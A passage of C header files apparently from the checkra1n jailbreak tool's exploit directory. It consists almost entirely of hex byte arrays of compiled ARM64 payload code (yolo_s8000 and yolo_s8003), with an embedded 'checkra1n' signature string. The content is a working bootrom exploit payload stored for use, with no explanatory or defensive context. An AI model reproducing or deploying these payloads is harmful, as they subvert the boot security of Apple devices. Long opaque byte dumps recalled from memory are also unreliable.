0x01, 0x00, 0x94, 0xdf, 0x01, 0x00, 0x94, 45 | 0x01, 0x02, 0x00, 0x94, 0x20, 0x13, 0x00, 0x91, 0x01, 0xc0, 0xa6, 0x52, 46 | 0x01, 0x01, 0x80, 0x72, 0xe2, 0x4b, 0x0e, 0x32, 0xe3, 0x2b, 0x18, 0x32, 47 | 0x05, 0x3c, 0xc0, 0x92, 0x05, 0xf0, 0xbf, 0xf2, 0x05, 0x02, 0x80, 0xf2, 48 | 0x06, 0x50, 0xbe, 0xd2, 0xc7, 0x40, 0x00, 0x91, 0x06, 0x28, 0xf7, 0xf2, 49 | 0x06, 0x01, 0xc0, 0xf2, 0xe7, 0x0b, 0xf7, 0xf2, 0x07, 0x41, 0xd8, 0xf2, 50 | 0x00, 0x10, 0x00, 0x91, 0x9f, 0x01, 0x00, 0x94, 0xa0, 0x12, 0x00, 0xb4, 51 | 0x04, 0x80, 0x5f, 0xf8, 0x84, 0x00, 0x05, 0x8a, 0x9f, 0x00, 0x06, 0xeb, 52 | 0x84, 0x10, 0x47, 0xfa, 0x21, 0xff, 0xff, 0x54, 0x04, 0x21, 0x80, 0x52, 53 | 0x04, 0x40, 0xa6, 0x72, 0x04, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0xd1, 54 | 0x01, 0x00, 0x80, 0x52, 0x01, 0x80, 0xb2, 0x72, 0x02, 0x00, 0x80, 0x52, 55 | 0x02, 0x80, 0xbf, 0x72, 0x03, 0x80, 0x00, 0xd1, 0x04, 0xcc, 0x5f, 0xf8, 56 | 0x84, 0x00, 0x02, 0x8a, 0x9f, 0x00, 0x01, 0xeb, 0x80, 0x00, 0x00, 0x54, 57 | 0x1f, 0x00, 0x03, 0xeb, 0x68, 0xff, 0xff, 0x54, 0x80, 0x00, 0x00, 0x14, 58 | 0x62, 0xa0, 0xba, 0x52, 0xe2, 0x03, 0x84, 0x72, 0x02, 0x08, 0x00, 0x29, 59 | 0xe0, 0x03, 0x19, 0xaa, 0xf4, 0x01, 0x00, 0x94, 0xe1, 0x2b, 0x18, 0x32, 60 | 0x01, 0x00, 0x01, 0x8b, 0x62, 0xa0, 0xba, 0x52, 0xe2, 0x03, 0x84, 0x72, 61 | 0x43, 0x80, 0x22, 0x11, 0x04, 0x80, 0xa2, 0x52, 0x87, 0x39, 0x80, 0xd2, 62 | 0x08, 0x00, 0x80, 0xd2, 0x1f, 0x00, 0x01, 0xeb, 0x22, 0x0e, 0x00, 0x54, 63 | 0x05, 0x00, 0x40, 0xb9, 0xbf, 0x00, 0x00, 0x71, 0xa4, 0x10, 0x42, 0x7a, 64 | 0xa4, 0x10, 0x43, 0x7a, 0xa4, 0x10, 0x44, 0x7a, 0x60, 0x00, 0x00, 0x54, 65 | 0x00, 0x10, 0x00, 0x91, 0xf7, 0xff, 0xff, 0x17, 0xe5, 0x03, 0x00, 0xaa, 66 | 0xa6, 0x4c, 0x40, 0xb8, 0xdf, 0x00, 0x00, 0x71, 0xc4, 0x10, 0x42, 0x7a, 67 | 0xc4, 0x10, 0x43, 0x7a, 0xc4, 0x10, 0x44, 0x7a, 0x60, 0x00, 0x00, 0x54, 68 | 0xe0, 0x03, 0x05, 0xaa, 0xee, 0xff, 0xff, 0x17, 0xa6, 0x00, 0x00, 0xcb, 69 | 0xdf, 0x00, 0x07, 0x6b, 0x42, 0x00, 0x00, 0x54, 0xf5, 0xff, 0xff, 0x17, 70 | 0xe9, 0x03, 0x00, 0xaa, 0xa8, 0x00, 0x00, 0xb5, 0xe8, 0x03, 0x09, 0xaa, 71 | 0xe0, 0x03, 0x05, 0xaa, 0x87, 0x3b, 0x80, 0xd2, 0xe4, 0xff, 0xff, 0x17, 72 | 0xe0, 0x03, 0x08, 0xaa, 0x61, 0x0e, 0x00, 0x10, 0x82, 0x39, 0x80, 0xd2, 73 | 0x6e, 0x00, 0x00, 0x94, 0xe0, 0x03, 0x09, 0xaa, 0x41, 0x1c, 0x00, 0x10, 74 | 0x82, 0x3b, 0x80, 0xd2, 0x6a, 0x00, 0x00, 0x94, 0x27, 0xc3, 0x09, 0x91, 75 | 0xe8, 0x24, 0x00, 0xa9, 0x20, 0x83, 0x0a, 0x91, 0xe8, 0x03, 0x00, 0xaa, 76 | 0x01, 0x0a, 0x00, 0x10, 0x02, 0x0c, 0x80, 0xd2, 0x63, 0x00, 0x00, 0x94, 77 | 0xe0, 0x03, 0x19, 0xaa, 0x01, 0x50, 0xba, 0x52, 0x41, 0x02, 0x80, 0x72, 78 | 0x02, 0x00, 0x80, 0x12, 0xe3, 0x2b, 0x18, 0x32, 0x4a, 0x01, 0x00, 0x94, 79 | 0x00, 0x08, 0x00, 0xb4, 0xc1, 0xa3, 0xba, 0x52, 0x01, 0x00, 0x82, 0x72, 80 | 0xe2, 0x03, 0x80, 0x12, 0x03, 0x40, 0x80, 0x52, 0x4d, 0x01, 0x00, 0x94, 81 | 0x40, 0x07, 0x00, 0xb4, 0x41, 0x16, 0x00, 0x18, 0x02, 0x00, 0x80, 0x12, 82 | 0x03, 0x04, 0x80, 0x52, 0x3f, 0x01, 0x00, 0x94, 0xa0, 0x06, 0x00, 0xb4, 83 | 0x24, 0x53, 0x09, 0x91, 0x05, 0x98, 0xc0, 0x29, 0x85, 0x18, 0x81, 0x28, 84 | 0x05, 0x18, 0x41, 0x29, 0xc7, 0x7c, 0x18, 0x53, 0xff, 0x60, 0x01, 0x71, 85 | 0x60, 0x00, 0x00, 0x54, 0x85, 0x18, 0x81, 0x28, 0x13, 0x00, 0x00, 0x14, 86 | 0x85, 0x44, 0x00, 0xb8, 0xc7, 0x5c, 0x05, 0x13, 0x07, 0xc8, 0x27, 0x8b, 87 | 0xe7, 0xc0, 0x40, 0xf8, 0xff, 0x3c, 0x50, 0xf2, 0xc1, 0x04, 0x00, 0x54, 88 | 0xc6, 0x10, 0x00, 0x12, 0x06, 0x58, 0xba, 0x72, 0xe5, 0xbc, 0x60, 0xd3, 89 | 0xa6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 0x06, 0x54, 0xbe, 0x72, 90 | 0xe5, 0x7c, 0x50, 0xd3, 0xa6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 91 | 0x06, 0x50, 0xbe, 0x72, 0xe6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 92 | 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 0x81, 0x00, 0x00, 0xb9, 93 | 0x01, 0x58, 0xba, 0x52, 0x41, 0x02, 0x80, 0x72, 0x05, 0xbd, 0x60, 0xd3, 94 | 0xa1, 0x3c, 0x1b, 0x33, 0x01, 0x00, 0x00, 0xb9, 0x01, 0x54, 0xbe, 0x72, 95 | 0x05, 0x7d, 0x50, 0xd3, 0xa1, 0x3c, 0x1b, 0x33, 0x01, 0x04, 0x00, 0xb9, 96 | 0x01, 0x50, 0xbe, 0x72, 0x01, 0x3d, 0x1b, 0x33, 0x01, 0x08, 0x00, 0xb9, 97 | 0xe1, 0xc7, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 0x01, 0x0c, 0x00, 0xb9, 98 | 0xe0, 0x03, 0x19, 0xaa, 0xe1, 0x03, 0x18, 0xaa, 0xfe, 0x03, 0x17, 0xaa, 99 | 0xfd, 0x03, 0x16, 0xaa, 0x9f, 0x3f, 0x03, 0xd5, 0xdf, 0x4f, 0x03, 0xd5, 100 | 0xc0, 0x03, 0x5f, 0xd6, 0x48, 0x00, 0xc0, 0xd2, 0x68, 0x05, 0xa2, 0xf2, 101 | 0x08, 0x00, 0x98, 0xf2, 0x00, 0x01, 0x40, 0xb9, 0x00, 0x78, 0x1f, 0x12, 102 | 0x00, 0x01, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x14, 0xf2, 0x03, 0x1e, 0xaa, 103 | 0xc0, 0xcf, 0x74, 0x92, 0x00, 0x00, 0x2f, 0x91, 0x81, 0x02, 0x00, 0x18, 104 | 0xc2, 0x4f, 0x40, 0xb8, 0x5f, 0x00, 0x01, 0x6b, 0xc1, 0xff, 0xff, 0x54, 105 | 0x04, 0x00, 0x1e, 0xcb, 0x02, 0x80, 0xa2, 0x52, 0x82, 0x6c, 0x02, 0x33, 106 | 0xc2, 0x03, 0x00, 0xb9, 0x21, 0xfd, 0xff, 0x58, 0x82, 0x39, 0x80, 0xd2, 107 | 0x08, 0x00, 0x00, 0x94, 0x01, 0xfd, 0xff, 0x58, 0x82, 0x3b, 0x80, 0xd2, 108 | 0x05, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 0xdb, 0xff, 0xff, 0x17, 109 | 0x24, 0x44, 0x40, 0xb8, 0x04, 0x44, 0x00, 0xb8, 0x42, 0x10, 0x00, 0x71, 110 | 0xa2, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0xdf, 0x4f, 0x03, 0xd5, 111 | 0xfc, 0x03, 0x1e, 0xaa, 0xfb, 0x03, 0x00, 0xaa, 0x48, 0x00, 0xc0, 0xd2, 112 | 0x68, 0x05, 0xa2, 0xf2, 0x08, 0x00, 0x80, 0xf2, 0x1f, 0x0d, 0x00, 0xb9, 113 | 0x1f, 0x1d, 0x00, 0xb9, 0x08, 0x19, 0x00, 0x58, 0x08, 0xc0, 0x1e, 0xd5, 114 | 0x20, 0x02, 0x00, 0x10, 0x21, 0x00, 0xc0, 0xd2, 0xe1, 0x01, 0xb0, 0xf2, 115 | 0x01, 0x00, 0x98, 0xf2, 0x22, 0x10, 0x40, 0x91, 0x1f, 0x00, 0x01, 0xeb, 116 | 0x02, 0x20, 0x42, 0xfa, 0x43, 0x01, 0x00, 0x54, 0x21, 0xb0, 0x01, 0x91, 117 | 0x22, 0xf0, 0x0c, 0x91, 0xe3, 0x03, 0x01, 0xaa, 0x04, 0x44, 0x40, 0xb8, 118 | 0x24, 0x44, 0x00, 0xb8, 0x3f, 0x00, 0x02, 0xeb, 0xa3, 0xff, 0xff, 0x54, 119 | 0x7a, 0x00, 0x00, 0x94, 0x60, 0x00, 0x1f, 0xd6, 0x20, 0x15, 0x00, 0x58, 120 | 0x41, 0x15, 0x00, 0x58, 0x02, 0x08, 0x81, 0x52, 0x7a, 0x00, 0x00, 0x94, 121 | 0x02, 0x66, 0x8f, 0x52, 0x7d, 0x00, 0x00, 0x94, 0xe0, 0x14, 0x00, 0x58, 122 | 0xbf, 0x41, 0x00, 0xd5, 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 123 | 0xbf, 0x40, 0x00, 0xd5, 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 124 | 0x48, 0x14, 0x00, 0x58, 0x00, 0x01, 0x00, 0xf9, 0xff, 0x44, 0x03, 0xd5, 125 | 0x1f, 0x75, 0x08, 0xd5, 0x09, 0x14, 0x00, 0x58, 0x07, 0x0c, 0xe0, 0xd2, 126 | 0x27, 0x84, 0x80, 0xf2, 0xe1, 0x03, 0x09, 0xaa, 0x02, 0x00, 0x90, 0x52, 127 | 0x6c, 0x00, 0x00, 0x94, 0xe8, 0x03, 0x09, 0xaa, 0x20, 0x00, 0xc0, 0xd2, 128 | 0x41, 0x00, 0xa0, 0x52, 0xa0, 0xd0, 0x80, 0xf2, 0x6f, 0x00, 0x00, 0x94, 129 | 0x40, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0xa4, 0x52, 0x00, 0x00, 0x07, 0xaa, 130 | 0x6b, 0x00, 0x00, 0x94, 0xc0, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0xa4, 0x52, 131 | 0x00, 0x00, 0x07, 0xaa, 0x67, 0x00, 0x00, 0x94, 0xe0, 0x00, 0xc0, 0xd2, 132 | 0x00, 0x00, 0xb8, 0xf2, 0x01, 0x40, 0xa0, 0x52, 0x00, 0x00, 0x07, 0xaa, 133 | 0x62, 0x00, 0x00, 0x94, 0x28, 0x11, 0x40, 0x91, 0x00, 0x05, 0x40, 0xb2, 134 | 0x20, 0x01, 0x03, 0xf9, 0xe0, 0x07, 0x61, 0xb2, 0x01, 0x08, 0xa0, 0x52, 135 | 0xe0, 0xc0, 0x80, 0xf2, 0x57, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 136 | 0x80, 0xe0, 0x9f, 0x52, 0x00, 0xa2, 0x1e, 0xd5, 0x09, 0x20, 0x1e, 0xd5, 137 | 0x20, 0x00, 0xa0, 0x52, 0x80, 0xa3, 0x94, 0x72, 0x40, 0x20, 0x1e, 0xd5, 138 | 0x1f, 0x87, 0x0e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 0xc0, 0x01, 0x80, 0x52, 139 | 0x00, 0x11, 0x1e, 0xd5, 0xa8, 0x01, 0x82, 0x52, 0x00, 0x10, 0x3e, 0xd5, 140 | 0x00, 0x00, 0x08, 0xaa, 0x00, 0x10, 0x1e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 141 | 0x28, 0x0f, 0x00, 0x58, 0xc0, 0x0e, 0x00, 0x58, 0x01, 0x02, 0xa0, 0x52, 142 | 0x01, 0x00, 0x80, 0x72, 0x22, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 143 | 0xb3, 0x0e, 0x00, 0x10, 0xd4, 0x0f, 0x00, 0x10, 0x68, 0x86, 0x40, 0xf8, 144 | 0x00, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 0x7f, 0x02, 0x14, 0xeb, 145 | 0x83, 0xff, 0xff, 0x54, 0x48, 0x0f, 0x00, 0x58, 0x20, 0x00, 0x80, 0x52, 146 | 0x00, 0x01, 0x3f, 0xd6, 0xc0, 0x09, 0x00, 0x10, 0x01, 0x0f, 0x00, 0x58, 147 | 0xe2, 0x01, 0x80, 0xd2, 0x03, 0x14, 0x40, 0x38, 0x23, 0x14, 0x00, 0x38, 148 | 0x42, 0x04, 0x00, 0x51, 0xa2, 0xff, 0xff, 0x35, 0x40, 0x09, 0x00, 0x70, 149 | 0x61, 0x0e, 0x00, 0x58, 0xa2, 0x03, 0x80, 0xd2, 0x03, 0x14, 0x40, 0x38, 150 | 0x23, 0x14, 0x00, 0x38, 0x42, 0x04, 0x00, 0x51, 0xa2, 0xff, 0xff, 0x35, 151 | 0x40, 0x00, 0x80, 0x52, 0xc1, 0x0d, 0x00, 0x58, 0x20, 0x00, 0x00, 0xb9, 152 | 0x88, 0x0c, 0x00, 0x58, 0x20, 0x0a, 0x00, 0x58, 0x01, 0x01, 0xa0, 0xd2, 153 | 0x00, 0x01, 0x3f, 0xd6, 0x31, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 154 | 0x80, 0x09, 0x00, 0x58, 0x01, 0x00, 0x42, 0x91, 0x20, 0x7b, 0x0b, 0xd5, 155 | 0x00, 0x00, 0x01, 0x91, 0x1f, 0x00, 0x01, 0xeb, 0xa3, 0xff, 0xff, 0x54, 156 | 0x0b, 0x00, 0x00, 0x94, 0xdf, 0x4f, 0x03, 0xd5, 0xbf, 0x41, 0x00, 0xd5, 157 | 0xff, 0x03, 0x40, 0x92, 0x1f, 0x41, 0x18, 0xd5, 0x1f, 0xc0, 0x1e, 0xd5, 158 | 0xdf, 0x3f, 0x03, 0xd5, 0xfe, 0x03, 0x1c, 0xaa, 0xe0, 0x03, 0x1b, 0xaa, 159 | 0xa8, 0x07, 0x00, 0x58, 0x00, 0x01, 0x1f, 0xd6, 0x9f, 0x3f, 0x03, 0xd5, 160 | 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 161 | 0xc0, 0x03, 0x5f, 0xd6, 0x03, 0x10, 0xc1, 0xa8, 0x23, 0x10, 0x81, 0xa8, 162 | 0x42, 0x40, 0x00, 0x71, 0xa8, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 163 | 0x3f, 0x7c, 0x81, 0xa8, 0x42, 0x40, 0x00, 0x71, 0xc8, 0xff, 0xff, 0x54, 164 | 0xc0, 0x03, 0x5f, 0xd6, 0x04, 0xfc, 0x4b, 0xd3, 0x21, 0xfc, 0x4e, 0xd3, 165 | 0x03, 0x00, 0x88, 0x52, 0x04, 0x00, 0x00, 0x14, 0x04, 0xfc, 0x56, 0xd3, 166 | 0x21, 0xfc, 0x59, 0xd3, 0x03, 0x40, 0xa0, 0x52, 0x84, 0x28, 0x7d, 0x92, 167 | 0x84, 0x00, 0x08, 0x8b, 0x02, 0x00, 0x80, 0x52, 0x80, 0x58, 0x22, 0xf8, 168 | 0x00, 0x00, 0x03, 0x8b, 0x42, 0x04, 0x00, 0x11, 0x5f, 0x00, 0x01, 0x6b, 169 | 0x83, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0x41, 0x00, 0xc0, 0xd2, 170 | 0x01, 0xe2, 0xa1, 0xf2, 0x01, 0x44, 0x80, 0xf2, 0x20, 0x00, 0x40, 0xb9, 171 | 0x00, 0x74, 0x1e, 0x12, 0x20, 0x00, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6, 172 | 0x1f, 0x20, 0x03, 0xd5, 0x59, 0x4f, 0x4c, 0x4f, 0x3a, 0x63, 0x68, 0x65, 173 | 0x63, 0x6b, 0x72, 0x61, 0x31, 0x6e, 0x00, 0x47, 0x41, 0x4e, 0x47, 0x3a, 174 | 0x4b, 0x4a, 0x43, 0x20, 0x48, 0x41, 0x58, 0x58, 0x3a, 0x41, 0x78, 0x69, 175 | 0x30, 0x6d, 0x58, 0x20, 0x45, 0x54, 0x41, 0x3a, 0x73, 0x6f, 0x6e, 0x00, 176 | 0x00, 0x90, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x80, 177 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x10, 0x0c, 0x80, 0x01, 0x00, 0x00, 0x00, 178 | 0x00, 0x02, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x80, 0x0c, 0x80, 179 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 180 | 0x00, 0xd0, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x80, 181 | 0x01, 0x00, 0x00, 0x00, 0x44, 0x70, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 182 | 0x24, 0xc3, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xd0, 0xb9, 0x00, 0x00, 183 | 0x01, 0x00, 0x00, 0x00, 0xf0, 0x1c, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 184 | 0x74, 0x11, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xcc, 0xc9, 0x00, 0x00, 185 | 0x01, 0x00, 0x00, 0x00, 0x84, 0xf0, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 186 | 0x68, 0x02, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0xa0, 0x79, 0x08, 0x80, 187 | 0x01, 0x00, 0x00, 0x00, 0xd7, 0x79, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 188 | 0x54, 0x79, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x40, 0xb9, 189 | 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 190 | 0x00, 0x10, 0x00, 0x91, 0x63, 0x10, 0x00, 0x51, 0x43, 0xff, 0xff, 0x35, 191 | 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 0x04, 0x00, 0x40, 0xb9, 192 | 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 193 | 0x00, 0x10, 0x00, 0xd1, 0x63, 0x10, 0x00, 0x51, 0x43, 0xff, 0xff, 0x35, 194 | 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 195 | 0xa5, 0x4e, 0xb2, 0x52, 0x05, 0x00, 0x9a, 0x72, 0x06, 0x48, 0xb6, 0x52, 196 | 0xe7, 0x43, 0xb5, 0x52, 0x28, 0x40, 0xa5, 0x52, 0x08, 0x7c, 0x80, 0x72, 197 | 0x43, 0x44, 0x40, 0xb8, 0x64, 0x68, 0x1b, 0x12, 0x9f, 0x00, 0x05, 0x6b, 198 | 0xa1, 0xff, 0xff, 0x54, 0x66, 0x10, 0x1b, 0x33, 0x44, 0x00, 0x40, 0xb9, 199 | 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x06, 0x6b, 0x60, 0x01, 0x00, 0x54, 200 | 0x7f, 0x00, 0x08, 0x6b, 0xc1, 0xfe, 0xff, 0x54, 0xc9, 0x10, 0x1b, 0x12, 201 | 0x09, 0x40, 0xb5, 0x72, 0x89, 0x10, 0x10, 0x33, 0x44, 0x04, 0x40, 0xb9, 202 | 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x09, 0x6b, 0xe1, 0xfd, 0xff, 0x54, 203 | 0x42, 0x10, 0x00, 0x91, 0x87, 0x24, 0x00, 0x33, 0x47, 0x00, 0x00, 0xb9, 204 | 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 0xc7, 0x41, 0xa6, 0x52, 205 | 0x07, 0x7c, 0x80, 0x72, 0x08, 0x54, 0xaa, 0x52, 0x08, 0x10, 0x80, 0x72, 206 | 0x09, 0x40, 0xb5, 0x52, 0x09, 0x7e, 0x80, 0x72, 0xea, 0x40, 0x40, 0x51, 207 | 0x0b, 0x01, 0x02, 0x11, 0x43, 0x44, 0x40, 0xb8, 0x7f, 0x00, 0x07, 0x6b, 208 | 0x64, 0x10, 0x48, 0x7a, 0xa1, 0xff, 0xff, 0x54, 0x43, 0x90, 0x40, 0x29, 209 | 0x63, 0x6c, 0x1c, 0x12, 0x9f, 0x00, 0x0a, 0x6b, 0x84, 0x10, 0x4b, 0x7a, 210 | 0x60, 0x00, 0x49, 0x7a, 0xe1, 0xfe, 0xff, 0x54, 0x43, 0x00, 0x40, 0xb9, 211 | 0x44, 0x0c, 0x40, 0xb9, 0x63, 0x00, 0x04, 0x4b, 0x84, 0x7c, 0x1a, 0x53, 212 | 0x9f, 0x94, 0x00, 0x71, 0x60, 0x08, 0x43, 0x7a, 0x01, 0xfe, 0xff, 0x54, 213 | 0x42, 0x30, 0x00, 0x91, 0x43, 0x4c, 0x40, 0xb8, 0x64, 0x7c, 0x1a, 0x53, 214 | 0x9f, 0x94, 0x00, 0x71, 0xa1, 0xff, 0xff, 0x54, 0x63, 0x64, 0x00, 0x13, 215 | 0x47, 0x00, 0x00, 0x18, 0x47, 0xd8, 0x23, 0xb8, 0xc0, 0x03, 0x5f, 0xd6, 216 | 0xe2, 0x03, 0x00, 0xaa, 0x08, 0x40, 0xa6, 0x52, 0x08, 0xfc, 0x80, 0x72, 217 | 0x09, 0x50, 0xaa, 0x52, 0x09, 0x0c, 0x80, 0x72, 0xaa, 0x04, 0x80, 0x52, 218 | 0x43, 0x44, 0x40, 0xb8, 0x7f, 0x00, 0x08, 0x6b, 0x64, 0x10, 0x49, 0x7a, 219 | 0xa1, 0xff, 0xff, 0x54, 0x43, 0x10, 0x40, 0x29, 0x45, 0x18, 0x41, 0x29, 220 | 0x47, 0x10, 0x40, 0xb9, 0x63, 0x7c, 0x1a, 0x53, 0xa5, 0x7c, 0x1a, 0x53, 221 | 0x9f, 0x00, 0x08, 0x6b, 0x84, 0x10, 0x49, 0x7a, 0xa1, 0xfe, 0xff, 0x54, 222 | 0xdf, 0x00, 0x08, 0x6b, 0xc4, 0x10, 0x49, 0x7a, 0xe4, 0x7c, 0x1a, 0x53, 223 | 0x60, 0x00, 0x4a, 0x7a, 0xa0, 0x00, 0x4a, 0x7a, 0x80, 0x00, 0x4a, 0x7a, 224 | 0xc1, 0xfd, 0xff, 0x54, 0x42, 0x40, 0x00, 0x91, 0xe7, 0x64, 0x00, 0x13, 225 | 0x43, 0x00, 0x00, 0x18, 0x43, 0xd8, 0x27, 0xb8, 0xc0, 0x03, 0x5f, 0xd6, 226 | 0xe2, 0x03, 0x00, 0xaa, 0x03, 0x28, 0xb7, 0x52, 0x23, 0x21, 0x80, 0x72, 227 | 0x24, 0x40, 0xa6, 0x52, 0x24, 0x25, 0x80, 0x72, 0x05, 0x20, 0xb7, 0x52, 228 | 0x25, 0x21, 0x80, 0x72, 0x66, 0xa0, 0xba, 0x52, 0xe6, 0xf3, 0x87, 0x72, 229 | 0xe7, 0xcb, 0xba, 0x52, 0x07, 0x78, 0x80, 0x72, 0x08, 0x50, 0xbe, 0x52, 230 | 0x08, 0x01, 0x80, 0x72, 0x09, 0x80, 0xa6, 0x52, 0x4a, 0xac, 0xc0, 0x29, 231 | 0x5f, 0x01, 0x03, 0x6b, 0x60, 0x01, 0x44, 0x7a, 0xa1, 0xff, 0xff, 0x54, 232 | 0x4a, 0x2c, 0x41, 0x29, 0x7f, 0x01, 0x06, 0x6b, 0x64, 0x11, 0x47, 0x7a, 233 | 0x40, 0x01, 0x45, 0x7a, 0x01, 0xff, 0xff, 0x54, 0x4a, 0xc0, 0x5f, 0xb8, 234 | 0x4a, 0x35, 0x09, 0x12, 0x5f, 0x01, 0x08, 0x6b, 0x81, 0xfe, 0xff, 0x54, 235 | 0x4a, 0x10, 0x00, 0xd1, 0x4b, 0x61, 0x00, 0xd1, 0x4c, 0xcd, 0x5f, 0xb8, 236 | 0x8d, 0x35, 0x09, 0x12, 0xbf, 0x01, 0x09, 0x6b, 0x80, 0x00, 0x00, 0x54, 237 | 0x5f, 0x01, 0x0b, 0xeb, 0x68, 0xff, 0xff, 0x54, 0xeb, 0xff, 0xff, 0x17, 238 | 0x8c, 0x5d, 0x05, 0x13, 0x08, 0x80, 0xa2, 0x52, 0x88, 0x65, 0x00, 0x33, 239 | 0x48, 0x01, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6 240 | }; 241 | unsigned int yolo_s8000_bin_len = 2852; 242 | -------------------------------------------------------------------------------- /include/exploit/checkra1n/yolo_s8003.h: -------------------------------------------------------------------------------- 1 | unsigned char yolo_s8003_bin[] = { 2 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 3 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x38, 0x80, 4 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0c, 0xde, 0x00, 0x00, 5 | 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 6 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 7 | 0x00, 0x00, 0x00, 0x00, 0x0c, 0xde, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 8 | 0x40, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 9 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 10 | 0x0c, 0xde, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 11 | 0x00, 0x00, 0x00, 0x00, 0x58, 0x2f, 0x0c, 0x80, 0x01, 0x00, 0x00, 0x00, 12 | 0xc0, 0x1b, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 13 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 14 | 0xc0, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 0x2c, 0x04, 0x00, 0x00, 15 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 16 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 17 | 0x00, 0x00, 0x00, 0x00, 0x08, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 18 | 0x00, 0x00, 0x00, 0x10, 0x01, 0x53, 0x00, 0x10, 0x7e, 0x01, 0x00, 0x10, 19 | 0x9f, 0x3f, 0x03, 0xd5, 0x20, 0x7b, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 20 | 0x1f, 0x00, 0x01, 0xeb, 0xa3, 0xff, 0xff, 0x54, 0x9f, 0x3f, 0x03, 0xd5, 21 | 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 22 | 0xc0, 0x03, 0x5f, 0xd6, 0xe0, 0x07, 0x61, 0xb2, 0x21, 0x00, 0xc0, 0xd2, 23 | 0x42, 0x00, 0xa0, 0x52, 0x03, 0x01, 0x00, 0x94, 0xe0, 0x07, 0x61, 0xb2, 24 | 0x80, 0x83, 0x94, 0xf2, 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x78, 0x80, 0x72, 25 | 0x01, 0x00, 0x00, 0xb9, 0xe0, 0x07, 0x61, 0xb2, 0x07, 0x24, 0x40, 0x91, 26 | 0x01, 0x80, 0xb2, 0x52, 0x01, 0x20, 0x80, 0x72, 0xe1, 0x00, 0x00, 